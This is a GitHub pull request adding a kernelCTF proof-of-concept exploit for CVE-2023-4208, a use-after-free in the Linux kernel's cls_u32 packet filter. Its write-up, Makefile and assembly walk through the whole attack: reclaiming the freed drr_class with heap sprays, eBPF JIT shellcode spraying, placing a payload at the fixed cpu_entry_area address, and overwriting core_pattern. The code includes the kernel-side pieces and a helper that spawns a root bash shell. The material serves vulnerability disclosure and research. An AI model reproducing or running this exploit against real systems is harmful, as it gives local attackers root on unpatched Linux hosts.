Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-4208_lts_cos_mitigation #7

Open
wants to merge 2 commits into
base: test
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
230 changes: 230 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-4208_lts_cos_mitigation/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,230 @@
### Triggering Vulnerability
Using this vulnerability, we can set reference counter of qdisc class to 0, and then free qdisc class (by deleting the class) while it still attached to the active filter.
When packet sent to the network, it will enqueue to the network scheduler. If the packet match to our filter, then it will return our freed qdisc class.
Qdisc class object contain qdisc object which used to enqueue packets to the respective network interface via function pointer.

Snippet code if we use drr_class as target object as target object.

```c++
static int drr_enqueue(struct sk_buff *skb, struct Qdisc *sch,
struct sk_buff **to_free)
{
unsigned int len = qdisc_pkt_len(skb);
struct drr_sched *q = qdisc_priv(sch);
struct drr_class *cl;
int err = 0;
bool first;

cl = drr_classify(skb, sch, &err); // [1]
...
err = qdisc_enqueue(skb, cl->qdisc, to_free);
...
return err;
}

static inline int qdisc_enqueue(struct sk_buff *skb, struct Qdisc *sch,
struct sk_buff **to_free)
{
qdisc_calculate_pkt_len(skb, sch);
return sch->enqueue(skb, sch, to_free); // [2]
}
```

In [1], drr_classify will return freed `drr_class`, then this freed object is used to get the qdisc object via `cl->qdisc` and passed to `qdisc_enqueue` function. If we can control `cl->qdisc->enqueue` we can get RIP control at [2].

### Target objects
Our target objects is `struct drr_class` that resides inside kmalloc-128.

### Spray objects

#### For LTS/COS instance

Since there is no CONFIG_KMALLOC_SPLIT_VARSIZE, we can reallocated `struct drr_class` with `ctl_buf`. We use sendmsg to spray ctl_buf with controlled data in line [3].

```C
static int ____sys_sendmsg(struct socket *sock, struct msghdr *msg_sys,
unsigned int flags, struct used_address *used_address,
unsigned int allowed_msghdr_flags)
...
BUILD_BUG_ON(sizeof(struct cmsghdr) !=
CMSG_ALIGN(sizeof(struct cmsghdr)));
if (ctl_len > sizeof(ctl)) {
ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL);
if (ctl_buf == NULL)
goto out;
}
err = -EFAULT;
if (copy_from_user(ctl_buf, msg_sys->msg_control_user, ctl_len)) //[3]
goto out_freectl;
```

#### For Mitigation instance
Because CONFIG_KMALLOC_SPLIT_VARSIZE is enable, we need to find a struct we can spray in kmalloc-128 fixed cache. We found out `struct ctnetlink_filter` is in the right cache. We can spray it and put payload.

```C
static struct ctnetlink_filter *
ctnetlink_alloc_filter(const struct nlattr * const cda[], u8 family)
{
struct ctnetlink_filter *filter;
int err;
...

filter = kzalloc(sizeof(*filter), GFP_KERNEL);
...
err = ctnetlink_parse_zone(cda[CTA_ZONE], &filter->zone);
if (err < 0)
goto err_filter;

err = ctnetlink_parse_filter(cda[CTA_FILTER], filter);
if (err < 0)

```

### KASLR Bypass
#### Spray eBPF programs
Our goal is to do some eBPF JIT spraying so later when we control kernel RIP, it will jump to the JIT page and execute our shellcode.

Linux kernel provide a socket option `SO_ATTACH_FILTER` and let user to attach a classic BPF program to the socket for use as a filter of incoming packets.

By creating lots of sockets and attach to classic BPF program, we can spray a lot of eBPF programs in kernel.
```cpp
struct sock_fprog prog = {
.len = TSIZE,
.filter = filter,
};
for(int i=0;i<NUM;i++){
int fd[2];
SYSCHK(socketpair(AF_UNIX,SOCK_DGRAM,0,fd));
SYSCHK(setsockopt(fd[0],SOL_SOCKET,26,&prog,sizeof(prog)));
}
```

As for the shellcode in our eBPF program, our goal is to overwrite `/proc/sys/kernel/core_pattern` so later we can execute command as root by triggering crash. Here's what our shellcode did to achieve our goal:
* Use the `rdmsr` instruction to obtain the kernel text address. With RCX being set to MSR_LSTAR ( `0xc0000082` ), we'll be able to obtain the address of `entry_SYSCALL_64`.
* Calculate the address of `core_pattern` and `_copy_from_user`.
* Call `_copy_from_user(core_pattern, user_buf, 0x30);`, where `user_buf` is a buffer in user space that stores the content we want to overwrite in `core_pattern`.

We construct our eBPF program with the following form:

```cpp
struct sock_filter table[] = {
{.code = BPF_LD + BPF_K, .k = 0xb3909090},
{.code = BPF_LD + BPF_K, .k = 0xb3909090},
.....................
};
```

The above example will be compiled into the following instructions after JIT:

```
b8 90 90 90 b3 mov eax, 0xb3909090
b8 90 90 90 b3 mov eax, 0xb3909090
```

If we can control kernel RIP to jump into the NOP instruction ( 0x90 ), the code will become:

```
90 nop
b3 b8 mov bl, 0xb8
90 nop
90 nop
90 nop
b3 b8 mov bl, 0xb8
....
```

We can see that by using an extra byte `0xb3`, we can skip the useless byte `0xb8` and execute our own shellcode. Notice that due to the "skipping part", we only have 3 bytes of space in each instruction, so we'll have to take care of that as well during our shellcode construction.

#### Put payload in fixed kernel address (CVE-2023-0597)
Linux kernel maps `cpu_entry_area` into a fixed kernel address in x86 and that region is also used as exception stack. We can put our payload in the registers and trigger exception from user space. The exception handler will push our registers in the exception stack, allowing us to control data in fixed kernel address.

Catch the signals and skip the offending instruction.
```C
signal(SIGFPE, handle);
signal(SIGTRAP, handle);
signal(SIGSEGV, handle);
setsid();
foo(payload);
```

Put our payload on registers in specific order

```asm
foo:
mov rsp,rdi
pop r15
pop r14
pop r13
pop r12
pop rbp
pop rbx
pop r11
pop r10
pop r9
pop r8
pop rax
pop rcx
pop rdx
pop rsi
pop rdi
div qword [0x1234000] ; trigger div 0 exception
```

As a result, we can control about 0x80 bytes in fixed kernel address.

### RIP Control
We set `cl->qdisc` to fixed kernel address that contain our controlled value, and then set `enqueue` function pointer to guessed ebpf JIT address.

### Post RIP

Once we control the kernel RIP and jump into the middle of our eBPF program, the shellcode we crafted will cause core_pattern being overwritten to `|/proc/%P/fd/666`:

We then use memfd and write an executable file payload in fd 666.
```C
int check_core()
{
// Check if /proc/sys/kernel/core_pattern has been overwritten
char buf[0x100] = {};
int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
read(core, buf, sizeof(buf));
close(core);
return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
}
void crash(char *cmd)
{
int memfd = memfd_create("", 0);
SYSCHK(sendfile(memfd, open("root", 0), 0, 0xffffffff));
dup2(memfd, 666);
close(memfd);
while (check_core() == 0)
sleep(1);
*(size_t *)0 = 0;
}
```

Later when coredump happened, it will execute our executable file as root in root namespace:
```C
*(size_t*)0=0; //trigger coredump
```

Executable file `root` is used to spawn shell when coredump happened. This is the code looks like:
```c++
void* job(void* x){
FILE* fp = popen("pidof billy","r");
fread(buf,1,0x100,fp);
fclose(fp);
int pid = strtoull(buf,0,10);
int pfd = syscall(SYS_pidfd_open,pid,0);
int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
dup2(stdinfd,0);
dup2(stdoutfd,1);
dup2(stderrfd,2);
execlp("bash","bash",NULL);

}
int main(int argc,char** argv){
job(0);
}
```
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
- Requirements:
- Capabilites: CAP_NET_ADMIN
- Kernel configuration: CONFIG_NET_SCHED=y, CONFIG_NET_CLS_U32=y
- User namespaces required: Yes
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=de5df63228fc
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81
- Affected Version: v3.18-rc1 - v6.5-rc4
- Affected Component: net/sched: cls_u32
- Syscall to disable: disallow unprivileged username space
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-4208
- Cause: Use-After-Free
- Description: A use-after-free vulnerability in the Linux kernel's net/sched: cls_u32 component can be exploited to achieve local privilege escalation. When u32_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free. We recommend upgrading past commit 3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81.
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
exploit: poc root run.sh
tar czf ./poc.tar.gz root poc POC ip0 ip1
cp run.sh exploit
fallocate -l 512 exploit
dd if=poc.tar.gz of=exploit conv=notrunc oflag=append

poc: poc.c foo.o sc.h
gcc poc.c -o poc -static -no-pie -g foo.o -pthread
root: root.c
gcc -static -o root root.c
foo.o: foo.s
nasm -f elf64 foo.s
sc.h: sc.py
python3 sc.py > sc.h

clean:
rm -rf exploit poc foo.o sc.h root

Binary file not shown.
Binary file not shown.
Binary file not shown.
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
section .text
global write_to_cpu_entry_area
global handle
write_to_cpu_entry_area:
mov rsp,rdi
pop r15
pop r14
pop r13
pop r12
pop rbp
pop rbx
pop r11
pop r10
pop r9
pop r8
pop rax
pop rcx
pop rdx
pop rsi
pop rdi
div qword [0x1234000]




Binary file not shown.
Binary file not shown.
Binary file not shown.
Loading
Loading